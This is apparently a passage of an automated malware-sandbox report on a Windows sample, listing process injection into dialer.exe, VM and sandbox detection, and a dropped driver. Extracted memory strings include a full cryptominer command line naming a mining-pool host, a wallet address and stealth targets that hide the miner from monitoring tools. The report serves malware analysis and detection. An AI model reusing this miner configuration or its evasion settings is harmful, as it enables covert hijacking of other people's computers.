          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Contains functionality to compare user and computer (likely to detect sandboxes)
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,25_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,62_2_00000001400010C0
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: dialer.exe, 00000041.00000003.2138683912.000001C377300000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2138482082.000001C3772F2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3283235144.000001C3772F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=POOL.SUPPORTXMR.COM:80 --USER="46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW" --PASS="ULTIMA" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="YYCJBDWXJAOE.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=80 --CINIT-ID="IKZKMIIBPWTVHLGB"
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=POOL.SUPPORTXMR.COM:80 --USER="46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW" --PASS="ULTIMA" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="YYCJBDWXJAOE.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=80 --CINIT-ID="IKZKMIIBPWTVHLGB";;
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE]
          Source: dialer.exe, 00000041.00000003.2138683912.000001C377305000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2138756594.000001C37730D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE=
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2138683912.000001C377305000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3283235144.000001C3772F2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2138756594.000001C37730D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIALER.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:80--USER=46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW--PASS=ULTIMA--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=YYCJBDWXJAOE.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=10--CINIT-IDLE-CPU=80--CINIT-ID=IKZKMIIBPWTVHLGB1
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXET
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5522Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4342Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 7808Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2191Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7186
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2238
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9909
          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9869
          Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1815
          Source: C:\ProgramData\Screenshots\Lightshot.exeDropped PE file which has not been started: C:\Windows\Temp\yycjbdwxjaoe.sysJump to dropped file
          Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_40-14927
          Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_25-480
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeAPI coverage: 8.3 %
          Source: C:\ProgramData\Screenshots\Lightshot.exeAPI coverage: 8.3 %
          Source: C:\Windows\System32\lsass.exeAPI coverage: 8.2 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\dialer.exeAPI coverage: 1.2 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 7.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796Thread sleep count: 5522 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992Thread sleep count: 4342 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\System32\dialer.exe TID: 6204Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 6632Thread sleep count: 7808 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 6632Thread sleep time: -7808000s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 6632Thread sleep count: 2191 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 6632Thread sleep time: -2191000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3092Thread sleep count: 7186 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3092Thread sleep count: 2238 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 5968Thread sleep count: 9909 > 30
          Source: C:\Windows\System32\lsass.exe TID: 5968Thread sleep time: -9909000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5616Thread sleep count: 246 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5616Thread sleep time: -246000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 1852Thread sleep count: 9869 > 30
          Source: C:\Windows\System32\dwm.exe TID: 1852Thread sleep time: -9869000s >= -30000s
          Source: C:\Windows\System32\dialer.exe TID: 1576Thread sleep count: 1815 > 30
          Source: C:\Windows\System32\dialer.exe TID: 1576Thread sleep time: -181500s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2228Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2228Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3840Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3840Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6616Thread sleep count: 251 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6616Thread sleep time: -251000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5456Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5456Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E85898DCE0 FindFirstFileExW,31_2_000001E85898DCE0
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE86DCE0 FindFirstFileExW,39_2_00000140AE86DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5CDCE0 FindFirstFileExW,40_2_00000195DD5CDCE0
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA4DCE0 FindFirstFileExW,41_2_000001160CA4DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10ADCE0 FindFirstFileExW,66_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C93DCE0 FindFirstFileExW,67_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9854DCE0 FindFirstFileExW,68_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26531DCE0 FindFirstFileExW,69_2_000001D26531DCE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
          Source: dialer.exe, 00000040.00000002.3280436874.0000017C0CC30000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "NAy0{ht|GmYv;Yv&\z`yf`2{h0|3JAP[nX*[Csk9xUUPdBmsAEBO'`NK[YwmVL@dECrcyjxc|wGn~k}yc_BqA(k:F1"2?=n/vmCI^Hj_nX?Dx~#YBS/bASD
          Source: dialer.exe, 00000040.00000002.3280436874.0000017C0CC30000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _E(;`o1=_Un[=qRa!%^LCS3KoB~d9Ar/W[(cIjxxiWfzo_@$}?rna[.KDc`Z{>Xquh^b~zQ@52IFvovMCIU?!J9kie?cc[B A?iFficLJKgg~=/
          Source: lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
          Source: dialer.exe, 00000040.00000002.3280436874.0000017C0CC30000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 3Qg+@y9[b_E?a_pEpVkIzd1<PHza&Fc^S.QV@3ky2wVBDPbgr]FZPrlyH8rgof[}lN|ZUe`eLJn|qdYmYN\&zo~va?w%&_|ppM=Jz5c>dO3z]y[`9|=#}IZDD?7f{@cB{R]c)xj{9dPgl&|bhMN|@Xye8>-K:%c#_tdapBpgbFf>SrzCYS{#|r1auX3H{%YCD"Y*/v`9vNT|^SsYAr{[zw=`x>S=&%|F@(ifZQ`>VGrz0{MXhY?q}FG8NUL=NPa&LX@TCDF<AKii:yvs:)Q`cY=ZO"Xaa~s$S,'<zxmya<@yA~<gLtYGxtKnB>HgFsFV_Rqz{*1Eaw`lE<c$l(p%Lxp_RAPaZ 8liiAt}7]TY?UIDPc]i)d% u=VUE;aX@XnFjxx@5le2kxcMyp]otRPVVA>LH3a"yaMoi<a@vEgY;V|q%cQ9B\as1J}9&Xgof^vlSFa{6?#C5lC9@/}G_kcnn`=NILaSZAN[)e|}v|'tkO
          Source: dialer.exe, 00000040.00000002.3280436874.0000017C0CC30000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LwX<m=KcPysmP1DqVmciT?uHP`UbgXM'|oG8EHAi|r#'y5YGpx{h1Hc`z"Ex|y\^C.dmDw:{l%EvAqYyOC:>Qg1}Adv?x^yuNELySH7CmvoYfV\xkVOxO[Mj[vSn@`oyJyZmQCAxov{U@Y9QsiOmrZ[[dPTzAno"U5K;JeDg]z#l%Mn [XR}A9A:EBcDXPaAi78IlIgoBrYlh(}\mry[HKuOHf<]cKY`AEKCiclhCN{YGjj8TWyjQck]o{VsFtX#u2q8YwWw?RZG8P08zY8Jk"nhDCby@wCq
          Source: dialer.exe, 00000040.00000002.3280436874.0000017C0CC30000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: MP^1J^bijiXU}bRWCW|SG^z]v90[%?LcJ]{9|HgfSf&fd"_{8Y-INaF4)J?Ru]GrMJPP:IMjciXayz9vjdKyN>QnZf~<&v2cDWUS8Y6<Hdj b$knoFlmFiqHe8LU.FlnJURBD?kWf
          Source: svchost.exe, 00000028.00000003.2351763230.00000195DD66A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: dialer.exe, 00000041.00000002.3283235144.000001C377229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW \(w
          Source: svchost.exe, 00000044.00000002.3280283271.000001CA97800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
          Source: lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
          Source: dialer.exe, 00000040.00000002.3280436874.0000017C0CC30000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Uc8w[ncYRpnosipO.~YeN1B\_V#SM<}(X|JfN6vK$<"PQKYR1{88CKeyb]{FoZb|Fk9K{3d?/V @p9W@0M`Zeh7[[DFgs[A+RgV2DhvG{/gN5[KC1oFpdvZ\%[f%C>}VJ?=Mte{{"|m>}QJCWlzQ<3@>fc-_jp%*Wluh|0DSTZ?HI>\Ik`<D?68KySG<izpZLN<FxK}Fg]y;Bd}]3aaG;1[bVMCIc\P}kaNmezyJTrY!xQqN*GdTwuHF$[Si+Z$}18kTl1=KCXEXm'|Jr?fpXEbb&VvlBc!RPcel^NjhGb|nj}Gl*ak9{AwmS{Zy10r|9'DQUTM&ECP^KqQ}0pYgEvWDU{eR`f`sWNMiTL>
          Source: dwm.exe, 00000029.00000002.3298424961.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PointVMware&P
          Source: dwm.exe, 00000029.00000002.3298424961.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
          Source: lsass.exe, 00000027.00000002.3282721187.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2075994281.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.2080553669.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.3282343059.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.3294606031.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000043.00000000.2110935253.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000044.00000000.2113125759.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.3280647396.000001CA9782A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
